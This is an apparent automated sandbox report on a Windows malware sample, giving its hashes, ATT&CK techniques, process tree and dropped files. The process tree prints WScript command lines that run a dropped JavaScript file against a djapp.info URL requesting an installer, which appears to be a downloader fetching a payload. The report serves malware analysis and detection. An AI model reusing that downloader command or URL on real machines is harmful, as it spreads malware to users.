6b9446fe8c52f278c5995c5e4e48b4c892f4c3771f1d444ceef81a2e6a77ae30

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28/09/2024, 12:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe
Size

184KB
MD5

fc52a1e3f1e1c7c0b6005bcea6d45c46
SHA1

8f1d5109224a2cdd87c7ef8336fb074afedfe080
SHA256

6b9446fe8c52f278c5995c5e4e48b4c892f4c3771f1d444ceef81a2e6a77ae30
SHA512

143a9e95c81c1599dc69fb0f74ba778f4651b71a9a4efa24a979f1f93deb2255b5e0235e72dd2046be1b54524794d234429659af5e9e315173aca3818b2a972b
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3M:/7BSH8zUB+nGESaaRvoB7FJNndnR

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2164	WScript.exe
8	2164	WScript.exe
10	2164	WScript.exe
13	2800	WScript.exe
14	2800	WScript.exe
16	840	WScript.exe
17	840	WScript.exe
19	2708	WScript.exe
20	2708	WScript.exe
22	1912	WScript.exe
23	1912	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
380	2440	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 2164	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	30
PID 2440 wrote to memory of 2164	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	30
PID 2440 wrote to memory of 2164	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	30
PID 2440 wrote to memory of 2164	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	30
PID 2440 wrote to memory of 2800	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	33
PID 2440 wrote to memory of 2800	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	33
PID 2440 wrote to memory of 2800	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	33
PID 2440 wrote to memory of 2800	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	33
PID 2440 wrote to memory of 840	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	35
PID 2440 wrote to memory of 840	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	35
PID 2440 wrote to memory of 840	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	35
PID 2440 wrote to memory of 840	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	35
PID 2440 wrote to memory of 2708	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	37
PID 2440 wrote to memory of 2708	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	37
PID 2440 wrote to memory of 2708	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	37
PID 2440 wrote to memory of 2708	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	37
PID 2440 wrote to memory of 1912	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	39
PID 2440 wrote to memory of 1912	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	39
PID 2440 wrote to memory of 1912	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	39
PID 2440 wrote to memory of 1912	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	39
PID 2440 wrote to memory of 380	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	41
PID 2440 wrote to memory of 380	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	41
PID 2440 wrote to memory of 380	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	41
PID 2440 wrote to memory of 380	2440	fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe	41

C:\Users\Admin\AppData\Local\Temp\fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fc52a1e3f1e1c7c0b6005bcea6d45c46_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB960.js" http://www.djapp.info/?domain=OORSObqEpr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufB960.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2164
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB960.js" http://www.djapp.info/?domain=OORSObqEpr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufB960.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2800
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB960.js" http://www.djapp.info/?domain=OORSObqEpr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufB960.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:840
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB960.js" http://www.djapp.info/?domain=OORSObqEpr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufB960.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2708
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB960.js" http://www.djapp.info/?domain=OORSObqEpr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufB960.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1912
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 472
  2⤵
  - Program crash
  PID:380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
9cb588133fb47e8b9c5e704d669a2871

SHA1
b18a214830cc8f3e1a5cd71ede6f55a4ff0487dc

SHA256
a243afd512f11f49e9925a22c75f0ad09a8c640e7a59d49ab7e433d54967002e

SHA512
95d04c4a72387ff1b7eb8ec1a982a5bf5f8539d4fb80261f719227daabc556c0d203a531779c8e6baec1dd1e2c17b6adfad4ac55f74be7022c5dfaec6311a02c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
e44c8b8cb64c9068489c8c00880722f0

SHA1
d55f0cbe78b201860265a2a6e17ef05db5fd0b35

SHA256
e9525e9a93bf23bffcbf9f4875dc4670feec9bef2ad715503ca4cac6752da510

SHA512
d532de4b966930194261c91514625b9fcfbdffa9123e44bc8d1548756f7d840cf1cd68e6f75507a30357016701e43005ef6ff7866c58ec088d7f4cbd0999797f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
61bb4ff6acca4bb9a02096cb3ac8eb73

SHA1
18e166f3773117a2651d4e0e4801895fdecb4e25

SHA256
e7403db11bfd35cdcbfe9f97dea8a50607f8302c07054ffcc570afaee003efad

SHA512
680ece28ead9033041b8cbbfd1adc969f9678d627fa718c0fcbddbb67541f4e80715d7a3bf4fcbeeed78fff6323014511b84c4b692314cecb50df16a0d647c72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
6KB

MD5
28ca1c0f11c8308fc750cae305504aed

SHA1
7a52d8c2204034e04b4cae260c511970f6462b34

SHA256
83b3682ab636fb73633cb25131f56d2a3fe173628b35dce717ca0a3ef29c2fc7

SHA512
10c34ceedb7ce00ac3210c23027d13dbc6e2c349c1ea3c0d57942cb9c80f4133f9f8929788e77053e96db4ada1adee3032339ccfc241b8b603faacc929d9e079

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
6KB

MD5
321bead85cc6bea7c85ccaf12f77f408

SHA1
be6f7dbb0954deb8e386ab8ca308f1869eb1308a

SHA256
ad623d51687ef36900d320e797963cd0ef5a7138006b46332d2744ebf72bd234

SHA512
180c1bf700697639ad9cef86e116fb8b16d5c1c3b33f7fe3534fa909084da0dcf356e75e7ab424d0d6536c8070fcd8b3a6da427c634bcd2d280c2db6afc5467e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
6KB

MD5
a0b8217f10c7b36a70b8f831d1fca4a7

SHA1
cb49dc2743a6141235fa9312cee62471ee1f1fe5

SHA256
b20998c0061c1720f53057ebe28b4f1d8348749c74d0e5189f6a638edd9f017c

SHA512
2a7a0958add68fdae68c97f453ff09fc988a09cfd5e27bca5e18592b75c9f33e91ed8d53fe1d0525a29f3585023cfae96e19dcf8dde32a9acc66007f0e27fc28

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabFA.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar19A9.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufB960.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\YAW431R0.txt

Filesize
177B

MD5
a8284c97818220650ea6efe71d6c2a15

SHA1
801dd1ce5043a9650c24aafa2e999339375eeeae

SHA256
4b24ef38ce73842144c1a5fdf74fd57190169088effa7573a3b71b2831441e15

SHA512
c20940f56d127b298ae625d6e9d2f6474a60a67b10b85dfd2654cd65cd7bc4e8844bf65a41a83074ab268b0db4eed1ecf74080dcbd863a647524bd33318e55d7

Download Submit